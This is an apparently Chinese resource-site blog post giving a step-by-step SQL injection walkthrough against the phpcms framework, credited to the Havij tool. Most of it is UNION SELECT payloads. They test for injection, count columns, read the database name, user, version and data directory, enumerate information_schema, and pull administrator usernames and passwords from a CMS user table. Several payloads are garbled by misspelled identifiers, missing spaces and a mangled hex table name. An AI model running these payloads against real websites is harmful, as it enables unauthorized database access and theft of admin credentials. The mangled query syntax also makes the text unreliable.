首页 php 正文

我要投稿

php注入工具-phpcms框架SQL注入-基于Havij工具

bendan520 php

2023-09-04 0 1,464 百度已收录

立即下单

进入商城

进不了网站？换个网络试试！

sql注入步骤：

1、首先观察网站传输数据是通过GET还是POST方法：

A。如果是GET传输，则在url中输入?id=1'或“or then')来测试是否存在sql注入。

b. 如果是POST传输，则在输入框中输入?id=1'或“or then')，测试是否存在sql注入。

php注入工具-phpcms框架SQL注入-基于Havij工具

2、测试完成后，发现有注入，进行注入。首先，测试了多少种形式：

a.?id=1orderby* (*number为数字)来测试，

3、测试完表单后php注入工具，进行表单查询：

a.?id=1and1=2unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

（获取回显表格）

4、测量回波数据后php注入工具，可以查询：

A。查询当前数据库：?id=1and1=2unionselect1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15--+

b. 查询用户名：?id=1and1=2unionselect1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15--+

C。查询数据库版本：?id=1and1=2unionselect1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--+

d. 查询完整文件位置：?id=1and1=2unionselect1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15--+

5、获取以上数据并进行全局查询：

A。查询数据库：?id=1and1=2unionselect1,2,group_concat(convert(tabal_nameusinglatin1)),4,5,6,7,8,9,10,11,12,13,14,15frominformation_schema.SCHEMATA

b. 查询数据库表：?id=1and1=2unionselect1,2,group_concat(convert(SCHEMA_HAMEusing

latin1)), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 frominformation_schema.tabaleswheretable_schema=database() （查询database()中的表）

C。查询数据表中的列：?id=1and1=2unionselect1,2,group_concat(convert(column_nameusing

latin1)),4,5,6,7,8,9,10,11,12,13,14,15frominformation_schema.columnswheretable_name=0x636D735F75736557273(CMSUSER)#表名需要编码为16补码

d. 查询管理员帐号和密码：?id=1and1=2unionselect1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14 ,15fromcms. CMS_用户

收藏 (0) 打赏

感谢您的支持，我会继续努力的!

打开微信/支付宝扫一扫，即可进行扫码打赏哦，分享从这里开始，精彩与您同在

悟空资源网 php php注入工具-phpcms框架SQL注入-基于Havij工具 https://www.wkzy.net/game/193152.html

传输全局查询注入表单

bendan520

php调用php文件-php 文件参考

php文本替换-更改ZBLOG后端地址如此重要

常见问题

php 单词-初中语文重难数字的搭配. 你需要这些核心短语和经常测试的短语

php

bendan520

15小时前 4,086

php 时间相加-PHP时区设置

php

bendan520

1天前 8,629

php木马查杀-Linux上PHP木马及后门检测总结

php

bendan520

2天前 292

php注入漏洞-WordPress HDW 播放器插件 'wp-admin/admin

php

bendan520

2天前 1,387

php注入工具-phpcms框架SQL注入-基于Havij工具

相关文章

悟空资源

QQ交流群